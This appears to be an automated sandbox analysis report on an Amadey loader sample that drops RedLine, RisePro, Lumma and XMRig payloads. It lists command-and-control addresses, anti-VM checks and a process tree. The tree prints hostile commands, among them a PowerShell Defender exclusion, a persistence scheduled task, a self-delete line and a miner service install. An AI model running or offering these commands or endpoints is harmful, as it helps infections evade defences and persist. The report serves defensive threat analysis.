amadey | 548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5

Analysis

max time kernel
119s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
16-05-2024 21:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exe
Size

1.7MB
MD5

7a6f3f8c3b91748dfd40c5cab7d79f5c
SHA1

d2798dc3b9db21e9c06a76e9651c07b26a9b5318
SHA256

548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5
SHA512

66e662d00d888e10ee54db5008a30ec0f3fe0dfb3f45837d66eddc7805f8d8058ce520786a09863491f504c058900fc26544323b05f4e00abd30a68f813acd92
SSDEEP

49152:CVg1gwUlLMvSLh/UC7GfAvRdM1LkuAAbcYKL+2xq:CVgawUPn7uApdmkrMcZ+2c

Score

10^/10

amadey redline risepro xmrig 1 18befc @cloudytteam c767c0 evasion execution infostealer miner stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.20

Botnet

18befc

http://5.42.96.141

Attributes

install_dir
908f070dff
install_file
explorku.exe
strings_key
b25a9385246248a95c600f9a061438e1
url_paths
/go34ko8/index.php

rc4.plain

Extracted

Family

amadey

Version

4.20

Botnet

c767c0

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

redline

Botnet

185.215.113.67:26260

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe	family_redline
behavioral2/memory/2448-126-0x0000000000BD0000-0x0000000000C22000-memory.dmp	family_redline
behavioral2/memory/1328-130-0x00000000001E0000-0x00000000002A0000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe	family_redline
behavioral2/memory/4440-271-0x00000000008E0000-0x0000000000932000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro

XMRig Miner payload 4 IoCs

miner

Processes:

resource	yara_rule
C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe	family_xmrig
C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe	xmrig
C:\Windows\Temp\288626.exe	family_xmrig
C:\Windows\Temp\288626.exe	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exeexplorku.exeexplorku.exeamers.exeaxplons.exeaxplons.exeexplorku.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amers.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2444 powershell.exe
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
2444	powershell.exe

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

explorku.exeaxplons.exe548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exeexplorku.exeexplorku.exeamers.exeaxplons.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amers.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amers.exe

Executes dropped EXE 9 IoCs

Processes:

explorku.exeexplorku.exeamers.exeaxplons.exealex.exetrf.exekeks.exeaxplons.exeexplorku.exe

pid process

3372 explorku.exe
32 explorku.exe
2208 amers.exe
4296 axplons.exe
3108 alex.exe
1328 trf.exe
2448 keks.exe
4628 axplons.exe
1844 explorku.exe

pid	process
3372	explorku.exe
32	explorku.exe
2208	amers.exe
4296	axplons.exe
3108	alex.exe
1328	trf.exe
2448	keks.exe
4628	axplons.exe
1844	explorku.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

amers.exeaxplons.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine	amers.exe
Key opened	\REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine	axplons.exe

Themida packer 52 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/1848-0-0x0000000000D80000-0x00000000012CB000-memory.dmp	themida
behavioral2/memory/1848-1-0x0000000000D80000-0x00000000012CB000-memory.dmp	themida
behavioral2/memory/1848-3-0x0000000000D80000-0x00000000012CB000-memory.dmp	themida
behavioral2/memory/1848-5-0x0000000000D80000-0x00000000012CB000-memory.dmp	themida
behavioral2/memory/1848-7-0x0000000000D80000-0x00000000012CB000-memory.dmp	themida
behavioral2/memory/1848-6-0x0000000000D80000-0x00000000012CB000-memory.dmp	themida
behavioral2/memory/1848-4-0x0000000000D80000-0x00000000012CB000-memory.dmp	themida
behavioral2/memory/1848-2-0x0000000000D80000-0x00000000012CB000-memory.dmp	themida
behavioral2/memory/1848-8-0x0000000000D80000-0x00000000012CB000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe	themida
behavioral2/memory/1848-21-0x0000000000D80000-0x00000000012CB000-memory.dmp	themida
behavioral2/memory/3372-23-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/3372-29-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/3372-27-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/3372-26-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/3372-25-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/3372-28-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/3372-24-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/3372-22-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/3372-30-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/3372-31-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/32-39-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/3372-38-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/32-40-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/32-46-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/32-47-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/32-45-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/32-44-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/32-43-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/32-41-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/32-42-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/32-49-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/3372-81-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/1844-159-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/1844-165-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/1844-166-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/1844-163-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/1844-160-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/1844-164-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/1844-161-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/1844-162-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
behavioral2/memory/1844-170-0x0000000000370000-0x00000000008BB000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\1000014001\3ce3bee563.exe	themida
behavioral2/memory/456-196-0x0000000000D50000-0x00000000013DC000-memory.dmp	themida
behavioral2/memory/456-198-0x0000000000D50000-0x00000000013DC000-memory.dmp	themida
behavioral2/memory/456-195-0x0000000000D50000-0x00000000013DC000-memory.dmp	themida
behavioral2/memory/456-200-0x0000000000D50000-0x00000000013DC000-memory.dmp	themida
behavioral2/memory/456-203-0x0000000000D50000-0x00000000013DC000-memory.dmp	themida
behavioral2/memory/456-201-0x0000000000D50000-0x00000000013DC000-memory.dmp	themida
behavioral2/memory/456-202-0x0000000000D50000-0x00000000013DC000-memory.dmp	themida
behavioral2/memory/456-199-0x0000000000D50000-0x00000000013DC000-memory.dmp	themida
behavioral2/memory/456-197-0x0000000000D50000-0x00000000013DC000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

explorku.exe548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exeexplorku.exeexplorku.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

2 pastebin.com
35 pastebin.com
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

amers.exeaxplons.exeaxplons.exe

pid process

2208 amers.exe
4296 axplons.exe
4628 axplons.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

alex.exe

description pid process target process

PID 3108 set thread context of 4708 3108 alex.exe RegAsm.exe

flow	ioc
2	pastebin.com
35	pastebin.com

pid	process
2208	amers.exe
4296	axplons.exe
4628	axplons.exe

description	pid	process	target process
PID 3108 set thread context of 4708	3108	alex.exe	RegAsm.exe

Drops file in Windows directory 2 IoCs

Processes:

548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exeamers.exe

description	ioc	process
File created	C:\Windows\Tasks\explorku.job	548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exe
File created	C:\Windows\Tasks\axplons.job	amers.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

1852 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2768 3108 WerFault.exe alex.exe
3120 72 WerFault.exe dyawiL2mrhlnZfFFV4yi2gUY.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1540 schtasks.exe

pid	process
1852	sc.exe

pid	pid_target	process	target process
2768	3108	WerFault.exe	alex.exe
3120	72	WerFault.exe	dyawiL2mrhlnZfFFV4yi2gUY.exe

pid	process
1540	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

keks.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	keks.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	keks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

amers.exeaxplons.exeaxplons.exe

pid process

2208 amers.exe
2208 amers.exe
4296 axplons.exe
4296 axplons.exe
4628 axplons.exe
4628 axplons.exe

pid	process
2208	amers.exe
2208	amers.exe
4296	axplons.exe
4296	axplons.exe
4628	axplons.exe
4628	axplons.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

trf.exe

description	pid	process
Token: SeDebugPrivilege	1328	trf.exe
Token: SeBackupPrivilege	1328	trf.exe
Token: SeSecurityPrivilege	1328	trf.exe
Token: SeSecurityPrivilege	1328	trf.exe
Token: SeSecurityPrivilege	1328	trf.exe
Token: SeSecurityPrivilege	1328	trf.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exeexplorku.exeamers.exeaxplons.exealex.exeRegAsm.exe

description	pid	process	target process
PID 1848 wrote to memory of 3372	1848	548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exe	explorku.exe
PID 1848 wrote to memory of 3372	1848	548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exe	explorku.exe
PID 1848 wrote to memory of 3372	1848	548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exe	explorku.exe
PID 3372 wrote to memory of 3712	3372	explorku.exe	explorku.exe
PID 3372 wrote to memory of 3712	3372	explorku.exe	explorku.exe
PID 3372 wrote to memory of 3712	3372	explorku.exe	explorku.exe
PID 3372 wrote to memory of 2208	3372	explorku.exe	amers.exe
PID 3372 wrote to memory of 2208	3372	explorku.exe	amers.exe
PID 3372 wrote to memory of 2208	3372	explorku.exe	amers.exe
PID 2208 wrote to memory of 4296	2208	amers.exe	axplons.exe
PID 2208 wrote to memory of 4296	2208	amers.exe	axplons.exe
PID 2208 wrote to memory of 4296	2208	amers.exe	axplons.exe
PID 4296 wrote to memory of 3108	4296	axplons.exe	alex.exe
PID 4296 wrote to memory of 3108	4296	axplons.exe	alex.exe
PID 4296 wrote to memory of 3108	4296	axplons.exe	alex.exe
PID 3108 wrote to memory of 4708	3108	alex.exe	RegAsm.exe
PID 3108 wrote to memory of 4708	3108	alex.exe	RegAsm.exe
PID 3108 wrote to memory of 4708	3108	alex.exe	RegAsm.exe
PID 3108 wrote to memory of 4708	3108	alex.exe	RegAsm.exe
PID 3108 wrote to memory of 4708	3108	alex.exe	RegAsm.exe
PID 3108 wrote to memory of 4708	3108	alex.exe	RegAsm.exe
PID 3108 wrote to memory of 4708	3108	alex.exe	RegAsm.exe
PID 3108 wrote to memory of 4708	3108	alex.exe	RegAsm.exe
PID 4708 wrote to memory of 1328	4708	RegAsm.exe	trf.exe
PID 4708 wrote to memory of 1328	4708	RegAsm.exe	trf.exe
PID 4708 wrote to memory of 2448	4708	RegAsm.exe	keks.exe
PID 4708 wrote to memory of 2448	4708	RegAsm.exe	keks.exe
PID 4708 wrote to memory of 2448	4708	RegAsm.exe	keks.exe

C:\Users\Admin\AppData\Local\Temp\548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exe
"C:\Users\Admin\AppData\Local\Temp\548bbcd67953c23635a56a705c0b84dd73a8b52b899b5478f5c45ec8605c71c5.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1848
- C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
  "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of WriteProcessMemory
  PID:3372
- - C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
    "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
    3⤵
    PID:3712
- - C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe
    "C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2208
  - - C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
      "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4296
    - - C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3108
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4708
        
        C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:2448
        
        C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1328
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        7⤵
        
        PID:4804
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:2768
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 392
        6⤵
        Program crash
        
        PID:2768
    - - C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"
        5⤵
        
        PID:836
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1540
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3608
    - - C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
        5⤵
        
        PID:4440
    - - C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
        5⤵
        
        PID:3284
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameStabilityService\installm.bat" "
        6⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:1852
        
        C:\Program Files (x86)\GameStabilityService\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        
        PID:3080
        
        C:\Program Files (x86)\GameStabilityService\GameService.exe
        
        GameService install GameStabilityService "C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe"
        7⤵
        
        PID:3580
        
        C:\Program Files (x86)\GameStabilityService\GameService.exe
        
        GameService start GameStabilityService
        7⤵
        
        PID:3928
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:1056
    - - C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"
        5⤵
        
        PID:1432
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3832
    - - C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
        5⤵
        
        PID:1952
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3268
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:772
    - - C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
        5⤵
        
        PID:488
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:1540
    - - C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
        5⤵
        
        PID:1860
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2444
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        6⤵
        
        PID:2792
        
        C:\Users\Admin\Pictures\dyawiL2mrhlnZfFFV4yi2gUY.exe
        
        "C:\Users\Admin\Pictures\dyawiL2mrhlnZfFFV4yi2gUY.exe"
        7⤵
        
        PID:72
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 72 -s 480
        8⤵
        Program crash
        
        PID:3120
        
        C:\Users\Admin\Pictures\XBIgptdZvqbVJR6pdOsOiBG4.exe
        
        "C:\Users\Admin\Pictures\XBIgptdZvqbVJR6pdOsOiBG4.exe"
        7⤵
        
        PID:1496
        
        C:\Users\Admin\Pictures\78qUSF0713Fwqa47PfVTU3nk.exe
        
        "C:\Users\Admin\Pictures\78qUSF0713Fwqa47PfVTU3nk.exe"
        7⤵
        
        PID:4152
        
        C:\Users\Admin\Pictures\cg6QWYsBXCM79YaopC0zK8hM.exe
        
        "C:\Users\Admin\Pictures\cg6QWYsBXCM79YaopC0zK8hM.exe" /s
        7⤵
        
        PID:3392
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        6⤵
        
        PID:1800
- - C:\Users\Admin\AppData\Local\Temp\1000014001\3ce3bee563.exe
    "C:\Users\Admin\AppData\Local\Temp\1000014001\3ce3bee563.exe"
    3⤵
    PID:456

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:32

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3108 -ip 3108
1⤵
PID:2544

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
